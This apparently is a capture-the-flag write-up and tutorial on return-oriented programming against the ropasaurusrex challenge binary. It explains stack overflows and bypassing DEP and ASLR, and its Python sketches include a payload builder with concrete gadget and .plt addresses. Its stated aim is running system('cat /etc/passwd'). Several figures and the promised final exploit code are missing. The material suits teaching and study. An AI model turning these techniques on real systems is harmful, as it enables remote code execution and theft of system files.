ropasaurusrex: a primer on return-oriented programming

One of the worst feelings when playing a capture-the-flag challenge is the hindsight problem. You spend a few hours on a level—nothing like the amount of time I spent on cnot, not by a fraction—and realize that it was actually pretty easy. But also a brainfuck. That's what ROP's all about, after all!

Anyway, even though I spent a lot of time working on the wrong solution (specifically, I didn't think to bypass ASLR for quite a while), the process we took of completing the level first without, then with ASLR, is actually a good way to show it, so I'll take the same route in this post.

Before I say anything else, I have to thank HikingPete for being my wingman on this one. Thanks to him, we solved this puzzle much more quickly and, for a short time, were in 3rd place worldwide!

Coincidentally, I've been meaning to write a post on ROP for some time now. I even wrote a vulnerable demo program that I was going to base this on! But, since PlaidCTF gave us this challenge, I thought I'd talk about it instead! This isn't just a writeup; it's designed to be a fairly in-depth primer on return-oriented programming! If you're more interested in the process of solving a CTF level, have a look at my writeup of cnot. :)

What the heck is ROP?

ROP (return-oriented programming) is a modern name for a classic exploit called "return into libc". The idea is that you've found an overflow or other type of vulnerability in a program that lets you take control, but you have no reliable way to get your code into executable memory (DEP, or data execution prevention, means that you can't run code from anywhere you want anymore).

With ROP, you can pick and choose pieces of code that are already in sections of executable memory and are followed by a 'return'. Sometimes those pieces are simple, and sometimes they're complicated. In this exercise, we only need the simple stuff, thankfully!

But, we're getting ahead of ourselves. Let's first learn a little more about the stack! I'm not going to spend a ton of time explaining the stack, so if this is unclear, please check out my assembly tutorial.

The stack

I'm sure you've heard of the stack before. Stack overflows? Smashing the stack? But what's it actually mean? If you already know, feel free to treat this as a quick primer, or to just skip right to the next section. Up to you!

The simple idea is, let's say function A() calls function B() with two parameters, 1 and 2. Then B() calls C() with two parameters, 3 and 4. When you're in C(), the stack looks like this:

This is quite a mouthful (eyeful?) if you don't live and breathe all the time at this depth, so let me explain a bit. Every time you call a function, a new "stack frame" is built. A "frame" is simply some memory that the function allocates for itself on the stack. In fact, it doesn't even allocate it, it just adds stuff to the end and updates the esp register so any functions it calls know where its own stack frame needs to start (esp, the stack pointer, is basically a variable).

This stack frame holds the context for the current function, and lets you easily a) build frames for new functions being called, and b) return to previous frames (i.e., return from functions). esp (the stack pointer) moves up and down, but always points to the top of the stack (the lowest address).

Have you ever wondered where a function's local variables go when you call another function (or, better yet, you call the same function again recursively)? Of course not! But if you did, now you'd know: they wind up in an old stack frame that we return to later!

Now, let's look at what's stored on the stack, in the order it gets pushed (note that, confusingly, you can draw a stack either way; in this document, the stack grows from top to bottom, so the older/callers are on top and the newer/callees are on the bottom):

Parameters: The parameters that were passed into the function by the caller—these are extremely important with ROP.

Return address: Every function needs to know where to go when it's done. When you call a function, the address of the instruction right after the call is pushed onto the stack prior to entering the new function. When you return, the address is popped off the stack and is jumped to. This is extremely important with ROP.

Saved frame pointer: Let's totally ignore this. Seriously. It's just something that compilers typically do, except when they don't, and we won't speak of it again.

Local variables: A function can allocate as much memory as it needs (within reason) to store local variables. They go here. They don't matter at all for ROP and can be safely ignored.

So, to summarize: when a function is called, parameters are pushed onto the stack, followed by the return address. When the function returns, it grabs the return address off the stack and jumps to it. The parameters pushed onto the stack are removed by the calling function, except when they're not. We're going to assume the caller cleans up, that is, the function doesn't clean up after itself, since that's how it works in this challenge (and most of the time on Linux).
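If it helps to see that summary in motion, here's a rough Python model of a call and return. It's a toy, not real x86: the Stack class and call_and_return() are names I made up for illustration, and it assumes 4-byte slots with the last parameter pushed first (the usual cdecl order on 32-bit Linux).

```python
class Stack:
    """Toy 32-bit stack: a dict mapping address -> value, growing downward."""

    def __init__(self, top=0x1000):
        self.esp = top          # stack pointer; lower address == newer data
        self.mem = {}

    def push(self, value):
        self.esp -= 4
        self.mem[self.esp] = value

    def pop(self):
        value = self.mem[self.esp]
        self.esp += 4
        return value


def call_and_return(stack, args, return_address):
    """Model `call f(args...)`, then f's `ret`, then the caller's cleanup."""
    for arg in reversed(args):      # parameters go on first (last one first)
        stack.push(arg)
    stack.push(return_address)      # `call` pushes the return address
    # What the callee sees on entry: return address, then its parameters.
    frame_at_entry = [stack.mem[stack.esp + 4 * i] for i in range(len(args) + 1)]
    jumped_to = stack.pop()         # `ret` pops the return address and jumps
    stack.esp += 4 * len(args)      # the caller removes the parameters
    return frame_at_entry, jumped_to


s = Stack()
frame, target = call_and_return(s, [3, 4], 0x08048400)
print([hex(v) for v in frame], hex(target), hex(s.esp))
```

The thing to notice is that the callee never checks who put the return address there; it just pops whatever sits at esp and jumps.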

Heaven, hell, and stack frames

The main thing you have to understand to know ROP is this: a function's entire universe is its stack frame. The stack is its god, the parameters are its commandments, local variables are its sins, the saved frame pointer is its bible, and the return address is its heaven (okay, probably hell). It's all right there in the Book of Intel, chapter 3, verses 19 - 26 (note: it isn't actually, don't bother looking).

Let's say you call the sleep() function, and get to the first line; its stack frame is going to look like this:

When sleep() starts, this stack frame is all it sees. It can save a frame pointer (crap, I mentioned it twice since I promised not to; I swear I won't mention it again) and make room for local variables by subtracting the number of bytes it wants from esp (i.e., making esp point to a lower address). It can call other functions, which create new frames under esp. It can do many different things; what matters is that, when sleep() starts, the stack frame makes up its entire world.

And, of course, the caller, after sleep() returns, will remove "seconds" from the stack by adding 4 to esp (later on, we'll talk about how we have to use pop/pop/ret constructs to do the same thing).

In a properly working system, this is how life works. That's a safe assumption. The "seconds" value would only be on the stack if it was pushed, and the return address is going to point to the place it was called from. Duh. How else would it get there?

Controlling the stack

...well, since you asked, let me tell you. We've all heard of a "stack overflow", which involves overwriting a variable on the stack. What's that mean? Well, let's say we have a frame that looks like this:

The variable buf is 16 bytes long. What happens if a program tries to write to the 17th byte of buf (i.e., buf[16])? Well, it writes to the least significant byte of the return address (x86 is little endian, so the lowest-order byte comes first in memory). The 18th byte writes to the next byte of the return address, and so on. Therefore, we can change the return address to point to anywhere we want. Anywhere we want. So when the function returns, where's it go? Well, it thinks it's going to where it's supposed to go (in a perfect world, it would be), but nope! In this case, it's going to wherever the attacker wants it to. If the attacker says to jump to 0, it jumps to 0 and crashes. If the attacker says to go to 0x41414141 ("AAAA"), it jumps there and probably crashes. If the attacker says to jump to the stack... well, that's where it gets more complicated...
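Here's a small Python sketch of that overwrite. It assumes the simplified layout described above, with the 16-byte buf sitting directly below a 4-byte return address and nothing in between; overflow() and the starting return address 0x08048123 are made up for the demonstration.

```python
import struct

BUF_SIZE = 16


def overflow(data, original_return=0x08048123):
    """Copy `data` into buf with no bounds check; return the resulting return address.

    The frame is modelled as buf[16] immediately followed by a little-endian
    32-bit return address. `data` is expected to be at most 20 bytes.
    """
    frame = bytearray(BUF_SIZE) + bytearray(struct.pack("<I", original_return))
    frame[:len(data)] = data                     # the unchecked copy
    return struct.unpack_from("<I", frame, BUF_SIZE)[0]


for length in (16, 17, 18, 20):
    print(length, hex(overflow(b"A" * length)))
```

With 16 bytes the return address is untouched; each extra byte replaces one more byte of it, starting from the low end, until all four bytes are "AAAA".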

DEP

Traditionally, an attacker would change the return address to point to the stack, since the attacker already has the ability to put code on the stack (after all, code is just a bunch of bytes!). But, being that it was such a common and easy way to exploit systems, those assholes at OS companies (just kidding, I love you guys :) ) put a stop to it by introducing data execution prevention, or DEP. On any DEP-enabled system, you can no longer run code on the stack—or, more generally, anywhere an attacker can write—instead, it crashes.

So how the hell do I run code without being allowed to run code!?

Well, we're going to get to that. But first, let's look at the vulnerability that the challenge uses!

If you want to do this "better" (by which I mean, slower), check out Metasploit's pattern_create.rb and pattern_offset.rb. They're great when guessing is a slow process, but for the purpose of this challenge it was so quick to guess and check that I didn't bother.

Starting to write an exploit

The first thing you should do is start running ropasaurusrex as a network service. The folks who wrote the CTF used xinetd to do this, but we're going to use netcat, which is just as good (for our purposes):

How to waste time with ASLR

I called this section 'wasting time', because I didn't realize—at the time—that ASLR was enabled. However, assuming no ASLR actually makes this a much more instructive puzzle. So for now, let's not worry about ASLR—in fact, let's not even define ASLR. That'll come up in the next section.

Okay, so what do we want to do? We have a vulnerable process, and we have the libc shared library. What's the next step?

Well, our ultimate goal is to run system commands. Because stdin and stdout are both hooked up to the socket, if we could run, for example, system("cat /etc/passwd"), we'd be set! Once we do that, we can run any command. But doing that involves two things:

Getting the string cat /etc/passwd into memory somewhere

Running the system() function

Getting the string into memory

Getting the string into memory actually involves two sub-steps:

Find some memory that we can write to

Find a function that can write to it

Tall order? Not really! First things first, let's find some memory that we can read and write! The most obvious place is the .data section:

Uh oh, .data is only 8 bytes long. That's not enough! In theory, any region that's long enough, writable, and unused will do for what we need. Looking at the output of objdump -x, I see a section called .dynamic that seems to fit the bill:

The .dynamic section holds information for dynamic linking. We don't need that for what we're going to do, so let's choose address 0x08049530 to overwrite.

The next step is to find a function that can write our command string to address 0x08049530. The most convenient functions to use are the ones that are in the executable itself, rather than a library, since the functions in the executable won't change from system to system. Let's look at what we have:

Running it

Now that we've written cat /etc/passwd into memory, we need to call system() and point it at that address. It turns out, if we assume ASLR is off, this is easy. We know that the executable is linked with libc:

At the moment that read() returns, the stack pointer is in the location shown above. When it returns, it pops read()'s return address off the stack and jumps to it. At that point, this is what the stack looks like:

Uh oh, that's no good! The stack pointer is pointing to the middle of read()'s frame when we enter system(), not to the bottom of system()'s frame like we want it to! What do we do?

Well, when we perform a ROP exploit, there's a very important construct we need called pop/pop/ret. In this case, it's actually pop/pop/pop/ret, which we'll call "pppr" for short. Just remember, it's enough "pops" to clear the stack, followed by a return.

pop/pop/pop/ret is a construct that we use to remove the stuff we don't want off the stack. Since read() has three arguments, we need to pop all three of them off the stack, then return. To demonstrate, here's what the stack looks like immediately after read() returns to a pop/pop/pop/ret:
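To make the bookkeeping concrete, here's a rough Python simulation of the stack pointer walking through a chain. It's only a sketch: run_chain() is my own invention, the pop/pop/pop/ret address (PPPR) is a made-up placeholder rather than the real gadget address, and the system() address is just one of the values seen with ASLR in play.

```python
READ = 0x0804832c      # read()'s .plt entry
SYSTEM = 0xb766e450    # an address of system() from one particular run
BUF = 0x08049530       # our writable memory in .dynamic
PPPR = 0x08048f00      # HYPOTHETICAL placeholder for a pop/pop/pop/ret gadget


def run_chain(stack, gadgets):
    """Walk a list of 32-bit words the way the CPU would after a hijacked return.

    `gadgets` maps address -> ("func", name, nargs) or ("pops", count).
    Returns a log of each function reached and the arguments it would see.
    """
    esp = 0                          # index into `stack`, one slot per word
    log = []
    while esp < len(stack):
        target = stack[esp]          # `ret` pops an address and jumps to it
        esp += 1
        kind = gadgets.get(target)
        if kind is None:
            log.append(("crash", hex(target)))
            break
        if kind[0] == "func":
            _, name, nargs = kind
            # On entry, [esp] is the return address and the arguments follow.
            log.append((name, stack[esp + 1:esp + 1 + nargs]))
            # The function's own `ret` is handled by the next loop iteration.
        else:
            esp += kind[1]           # the pops discard that many words
    return log


gadgets = {
    READ: ("func", "read", 3),
    SYSTEM: ("func", "system", 1),
    PPPR: ("pops", 3),
}
chain = [READ, PPPR, 0, BUF, 16,        # read(0, buf, 16), returning to pppr
         SYSTEM, 0x44444444, BUF]       # system(buf), returning to junk
for entry in run_chain(chain, gadgets):
    print(entry)
```

The three pops skip exactly the three arguments of read(), so the following ret lands on system() with a clean frame of its own.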

What is ASLR?

ASLR—or address space layout randomization—is a defense implemented on all modern systems (except for FreeBSD) that randomizes the address that libraries are loaded at. As an example, let's run ropasaurusrex twice and get the address of system():

Notice that the address of system() changes from 0xb766e450 to 0xb76a7450. That's a problem!
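A quick bit of arithmetic on those two addresses shows what's actually being randomized. This is just a sketch; aslr_shift() is a name I made up, and the 4 KiB page size is an assumption (it's the usual size on 32-bit x86 Linux).

```python
PAGE_SIZE = 0x1000  # assumed: 4 KiB pages


def aslr_shift(addr_a, addr_b):
    """Return (difference, True if both addresses have the same offset within a page)."""
    delta = addr_b - addr_a
    same_page_offset = (addr_a % PAGE_SIZE) == (addr_b % PAGE_SIZE)
    return delta, same_page_offset


delta, same = aslr_shift(0xb766e450, 0xb76a7450)
print(hex(delta), same)
```

The low bits (0x450) don't move between the two runs; the addresses differ by a whole number of pages. That fits the library being loaded at a different page-aligned base each time, with everything inside it keeping the same relative position.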

Defeating ASLR

So, what do we know? Well, the binary itself isn't ASLRed, which means that we can rely on every address in it to stay put, which is useful. Most importantly, the relocation table will remain at the same address:

Well look at that.. a pointer to read() at a memory address that we know! What can we do with that, I wonder...? I'll give you a hint: we can use the write() function—which we also know—to grab data from arbitrary memory and write it to the socket.

Finally, running some code!

Okay, let's break this down into steps. We need to:

Copy a command into memory using the read() function.

Get the address of the read() function using the write() function.

Calculate the offset between read() and system(), which lets us get the address of system().

Call system().
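The offset step is just subtraction. Here's a minimal sketch, assuming the leaked value is the run-time address of a libc function (read() in this sketch) and that you've looked up both functions' offsets in your own copy of libc. system_from_leak() is a made-up helper, and the offsets in the example are invented numbers, not values from the real library.

```python
import struct


def system_from_leak(leaked_bytes, leaked_func_offset, system_offset):
    """Turn 4 leaked little-endian bytes into the run-time address of system().

    Both offsets are distances from the start of libc; they are inputs the
    caller must supply from their own libc, not values known to this sketch.
    """
    leaked_addr = struct.unpack("<I", leaked_bytes[:4])[0]
    libc_base = leaked_addr - leaked_func_offset
    return (libc_base + system_offset) & 0xffffffff


# Invented example: libc loaded at 0xb7700000, read() at +0xc0110, system() at +0x3a450.
leak = struct.pack("<I", 0xb7700000 + 0xc0110)
print(hex(system_from_leak(leak, 0xc0110, 0x3a450)))
```

Because the two functions live in the same library, the distance between them is the same on every run, no matter where ASLR puts the library.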

To call system(), we're gonna have to write the address of system() somewhere in memory, then call it. The easiest way to do that is to overwrite the address that read()'s .plt entry jumps to, then call read().

By now, you're probably confused. Don't worry, I was too. I was shocked I got this working. :)

Let's just go for broke now and get this working! Here's the stack frame we want:

Let's start at the bottom and work our way up! I tagged each frame with a number for easy reference.

Frame [1] we've seen before. It writes cmd into our writable memory. Frame [2] is a standard pop/pop/pop/ret to clean up the read().

Frame [3] uses write() to write the address of the read() function to the socket. Frame [4] uses a standard pop/pop/pop/ret to clean up after write().

Frame [5] reads another address over the socket and writes it to memory. This address is going to be the address of the system() call. Writing it to memory works because of how read() is called. Take a look at the read() call we've been using in gdb (0x0804832C) and you'll see this:

read() is actually implemented as an indirect jump! So if we can change what ds:0x804961c's value is, and still jump to it, then we can jump anywhere we want! So in frame [3] we read the address from memory (to get the actual address of read()) and in frame [5] we write a new address there.

Frame [6] is a standard pop/pop/pop/ret construct, with a small difference: the return address of the pop/pop/pop/ret is 0x804832c, which is actually read()'s .plt entry. Since frame [5] overwrote the pointer that read()'s .plt entry jumps through (at 0x804961c) with the address of system(), this call actually goes to system()!
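Laid end to end, the six frames can be sketched in Python like this. It only builds the bytes and does no networking. build_chain() is my own helper; buf, read()'s .plt entry and the pointer at 0x0804961c come from the text, while write()'s .plt address, the pop/pop/pop/ret address and the padding length are parameters you'd have to fill in from your own objdump and testing. The values in the example call are placeholders.

```python
import struct

BUF = 0x08049530        # writable memory in .dynamic
READ_PLT = 0x0804832c   # read()'s .plt entry
READ_PTR = 0x0804961c   # the pointer read()'s .plt entry jumps through


def p32(value):
    """Pack a 32-bit value as little endian."""
    return struct.pack("<I", value)


def build_chain(write_plt, pppr, cmd_len, padding_len):
    """Return padding followed by the ROP chain for frames [1] to [6]."""
    words = [
        READ_PLT, pppr, 0, BUF, cmd_len,    # [1] read(0, buf, len)   [2] pppr
        write_plt, pppr, 1, READ_PTR, 4,    # [3] write(1, ptr, 4)    [4] pppr
        READ_PLT, pppr, 0, READ_PTR, 4,     # [5] read(0, ptr, 4)     [6] pppr
        READ_PLT, 0x44444444, BUF,          # "read"(buf), which is now system(buf)
    ]
    return b"A" * padding_len + b"".join(p32(w) for w in words)


# Placeholder inputs, NOT taken from the text: replace with your own values.
payload = build_chain(write_plt=0x08048300, pppr=0x08048f00,
                      cmd_len=16, padding_len=32)
print(len(payload), payload[32:52].hex())
```

After sending this, the exploit still has to send the command, read the 4 leaked bytes, work out the address of system(), and send that address back, in that order, since each read() in the chain is waiting on the socket.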

Final code

Whew! That's quite complicated. Here's code that implements the full exploit for ropasaurusrex, bypassing both DEP and ASLR:

18 thoughts on “ropasaurusrex: a primer on return-oriented programming”

I had a hard time following how you manipulated the read() call yourself... I think you should point out (not in code comments) that you overflowed the return address to that of read(), with its expected parameters sitting in the buffer.

I have not been able to get the first part working, that is getting "cat /etc/passwd" at 0x08049530. Read saves the string on the stack but nothing at the location intended. Anybody else have this problem? Would appreciate any help.

The second parameter in read(int fd, void *buf, size_t count) is a pointer to the address to write to. In this example the author is trying to write "cat /etc/passwd" at the location (0x08049530) in the ".dynamic" section, not to the stack itself.

Thank you for the article! Encouraged by it, I attempted the exploit on an ASLR-disabled, amd64 OS. The fact, that amd64 ABI uses the registers to pass the parameters, greatly simplified the job. It was fun searching for the gadgets and exciting to see the exploit work.